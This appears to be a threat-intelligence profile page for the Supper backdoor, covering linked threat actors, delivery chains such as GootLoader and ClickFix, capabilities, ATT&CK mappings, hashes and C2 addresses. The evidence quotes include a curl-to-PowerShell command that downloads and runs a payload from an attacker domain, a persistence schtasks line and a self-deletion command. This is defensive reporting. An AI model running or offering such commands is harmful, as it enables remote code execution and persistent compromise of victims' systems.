Skip to main content
Mallory
MalwareRansomwareUsed by 3 actors

Supper

Supper is a backdoor malware family, also referred to in the provided reporting as SocksShell and ZAPCAT, that is used to provide remote access to compromised Windows systems and supports SOCKS5 proxying. Multiple reports describe it as a pre-ransomware backdoor frequently deployed after initial access, including after GootLoader/Storm-0494 intrusions and in ClickFix/Fake CAPTCHA infection chains. It has been associated in the content with the financially motivated threat actor Vanilla Tempest (previously tracked as DEV-0832 and Vice Society), and reporting links its use to intrusions that later deployed ransomware including INC and, more broadly, Rhysida, BlackCat, Zeppelin, and Quantum Locker in related Vanilla Tempest operations.

Observed delivery and infection vectors in the content include deployment after GootLoader infections obtained through SEO poisoning and compromised WordPress sites, manual execution of malicious PowerShell from ClickFix/Fake CAPTCHA lures, and delivery by the pkr_mtsi packer via malvertising and fake software download sites. In one investigated Polish incident, two DLLs identified as Supper (245282244.dll, SHA-256 2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc; and 760468301.dll, SHA-256 21b953dc06933a69bcb2e0ea2839b47288fc8f577e183c95a13fc3905061b4e6) were found under a user AppData\Local path, exported DllRegisterServer, and were assessed as part of the Supper family.

Capabilities directly described in the content include remote control of infected devices, SOCKS5 proxy setup/disconnection, shell execution, self-deletion, and use as a proxy to map internal networks and support lateral movement and data exfiltration. Reporting states Supper established persistence via a scheduled task named GoogleUpdateTask created with schtasks.exe using a minute-based trigger. Its command-and-control protocol is described as custom-encrypted and structured, with multiple buffers and a format used to process commands; one report states outbound messages used a custom XOR scheme with a new 4-byte key per message header. Additional tradecraft attributed to observed Supper variants includes API hammering, API hashing, runtime shellcode construction/reconstruction, hash-based DLL resolution, custom LZMA decompression, and custom encryption.

The content places Supper in intrusions affecting enterprise environments, including U.S. healthcare organizations and a large Polish organization. In Microsoft-reported healthcare intrusions, attackers used Supper alongside legitimate AnyDesk and MEGA tools, with lateral movement via RDP and WMI Provider Host before deploying INC ransomware. Huntress reporting describes rapid post-compromise activity in GootLoader-linked cases, including deployment of multiple Supper instances, WinRM-based lateral movement to domain controllers, creation of new admin users, and reconnaissance consistent with pre-ransomware operations.

High-confidence indicators mentioned in the content include the DLL hashes above and hardcoded or learned C2 endpoints 162.19.199.110:4043, 146.19.49.130:8080, 185.233.166.27:443, and 85.239.54.130.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Vanilla Tempest

Once inside, the attackers backdoored the systems with Supper malware and deployed the legitimate AnyDesk remote monitoring and MEGA data synchronization tools.

via bleeping computerbleepingcomputer.com
Storm-0494

Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.

via cyberwarzonecyberwarzone.com
Hive0163

X-Force links the group to malware developers/operators such as Broomstick, Supper, PortStarter, SystemBC, and Rhysida ransomware...

via security affairssecurityaffairs.com
MITRE ATT&CK

Techniques & procedures

10 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

4 techniques
T1053.005Scheduled TaskEvidence1

"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."

T1059.001PowerShellEvidence2
TacticExecution

"...copying a specific PowerShell script and executing it manually via the Windows Run dialog..."; "the initial PowerShell command retrieves a malicious payload from a remote domain"

T1059.003Windows Command ShellEvidence1
TacticExecution

Multiple strings: "C:\Windows\System32\cmd.exe"; commands like "/c systeminfo", "/c ipconfig /all", and Supper: "cmd.exe /C ping 1.1.1.1 ... & Del /f /q \"%s\""

T1204User ExecutionEvidence2
TacticExecution

"cmd /c curl naintn.com/... | powershell" ... "Fake CAPTCHA (ClickFix) attack... convince the victim to copy a malicious snippet, and execute it using the Win+R shortcut."

Persistence

2 techniques
T1053.005Scheduled TaskEvidence1

"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."

T1546Event Triggered ExecutionEvidence1

Once inside, the attackers backdoored the systems with Supper malware and deployed the legitimate AnyDesk remote monitoring and MEGA data synchronization tools.

T1053.005Scheduled TaskEvidence1

"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."

T1546Event Triggered ExecutionEvidence1

Once inside, the attackers backdoored the systems with Supper malware and deployed the legitimate AnyDesk remote monitoring and MEGA data synchronization tools.

Stealth

1 technique
T1027Obfuscated Files or InformationEvidence1
TacticStealth

"sample was obfuscated using an unidentified obfuscator"; "implement string decryption routines"; "packed with the same packer"; "custom algorithm" encrypting C2 data

T1090ProxyEvidence1

"The ability to proxy traffic through the infected machine allows threat actors to map the internal network stealthily"

T1090.003Multi-hop ProxyEvidence1

"Other supported commands include, at minimum, a SOCKS proxy feature"; YARA strings include "bad socks5 request" and "Starting Init SOCKS"

T1105Ingress Tool TransferEvidence2

"cmd /c curl naintn.com/... | powershell"

T1219Remote Access ToolsEvidence1

Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.

ACTIVITY FEED

Recent activity

11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping10

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.